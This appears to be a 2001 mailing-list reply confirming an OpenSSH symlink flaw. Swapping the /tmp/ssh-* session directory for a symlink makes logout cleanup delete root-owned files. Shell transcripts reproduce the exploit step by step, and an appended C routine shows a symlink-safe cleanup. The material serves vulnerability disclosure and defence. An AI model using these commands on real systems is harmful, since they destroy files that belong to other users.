
Re: SSH allows deletion of other users files...



On Mon, Jun 04, 2001 at 04:03:51PM -0500, Leonard Leblanc wrote:
> > >  [root@clarity /root]# touch /cookies;ls /cookies
> > >  /cookies
> > >  [root@clarity /root]# ssh zen@localhost
> > >  zen@localhost's password:
> > >  [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> > >  [zen@clarity zen]$ logout
> >
> > >  [root@clarity /root]# ls /cookies
> > >  /bin/ls: /cookies: No such file or directory
> >
> > I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
> >
> 
> I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
> Debian box.
hmm... it appears to work on my system too...
alm:~$ id
uid=1000(alson) gid=1001(friends) groups=1001(friends)
alm:~$ su -
Password: 
alm:~# mkdir /root/secret
alm:~# chmod 700 /root/secret
alm:~# chmod 600 /root/secret/cookies
alm:~# ls -l /root/secret/
total 0
-rw-------    1 root     root            0 Jun  5 00:04 cookies
alm:~# logout
alm:~$ ssh localhost
alson@localhost's password: 
alm:~$ rm -rf /tmp/ssh-XXoadRxj 
alm:~$ ln -s /root/secret /tmp/ssh-XXoadRxj
alm:~$ exit
Connection to localhost closed.
alm:~$ su -
Password: 
alm:~# ls -la /root/secret
total 3
drwx------    2 root     root         1024 Jun  5 00:07 .
drwx------   33 root     root         2048 Jun  5 00:04 ..
alm:~# sshd -V
sshd: option requires an argument -- V
sshd version OpenSSH_2.5.2p2
Usage: sshd [options]
...
alm:~# logout
alm:~$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090601f

BTW: I use the ssh2 protocol by default, so it's used here too

Don't call your important files cookies ;)
-- 
,-------------------------------------------.
> Name:           Alson van der Meulen      <
> Personal:       alson@linuxfreak.nl       <
> School:       alson@gymnasiumleiden.nl    <
`-------------------------------------------'
Do you smell something?
---------------------------------------------
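
As an added example (not part of the original message and not OpenSSH's code), this C routine shows how a privileged cleanup of a per-session /tmp directory can refuse a path that was swapped for a symlink, as in the transcript above. The names `safe_cleanup` and `demo`, the device/inode pair recorded at login, and the `/tmp/sess-*` and `/tmp/prot-*` paths are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove a session directory only if `path` is still the directory created
 * at login (same device and inode). Returns 0 on success, -1 otherwise. */
int safe_cleanup(const char *path, dev_t dev, ino_t ino)
{
    struct stat st;
    struct dirent *e;
    DIR *d = NULL;
    /* O_NOFOLLOW: open() fails if the last path component is a symlink. */
    int rc = 0, fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    /* fstat() inspects the object we opened, not what the name means now. */
    if (fstat(fd, &st) < 0 || st.st_dev != dev || st.st_ino != ino ||
        (d = fdopendir(fd)) == NULL) {
        close(fd);
        return -1;
    }
    while ((e = readdir(d)) != NULL)   /* unlinkat is relative to the verified fd */
        if (strcmp(e->d_name, ".") && strcmp(e->d_name, "..") &&
            unlinkat(fd, e->d_name, 0) < 0)
            rc = -1;
    closedir(d);                       /* also closes fd */
    return (rc == 0 && rmdir(path) == 0) ? 0 : -1; /* rmdir never follows a final symlink */
}

/* Constructed scenario. swap=1 mirrors the transcript (session directory replaced by a
 * symlink). Returns 1 when the protected file survives and cleanup refused/succeeded as expected. */
int demo(int swap)
{
    char sess[] = "/tmp/sess-XXXXXX", prot[] = "/tmp/prot-XXXXXX", f[64];
    struct stat st;
    if (!mkdtemp(sess) || !mkdtemp(prot) || stat(sess, &st) < 0)
        return -1;
    snprintf(f, sizeof f, "%s/cookies", prot);
    close(open(f, O_CREAT | O_WRONLY, 0600));   /* the file that must survive */
    if (swap && (rmdir(sess) < 0 || symlink(prot, sess) < 0))
        return -1;
    int ok = safe_cleanup(sess, st.st_dev, st.st_ino) == (swap ? -1 : 0) && access(f, F_OK) == 0;
    unlink(sess); unlink(f); rmdir(prot);       /* tidy up the demo's own files */
    return ok;
}
```

`demo(1)` exercises the swapped-symlink case and `demo(0)` the normal logout case; entries that are subdirectories are left in place and reported as an error rather than recursed into.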


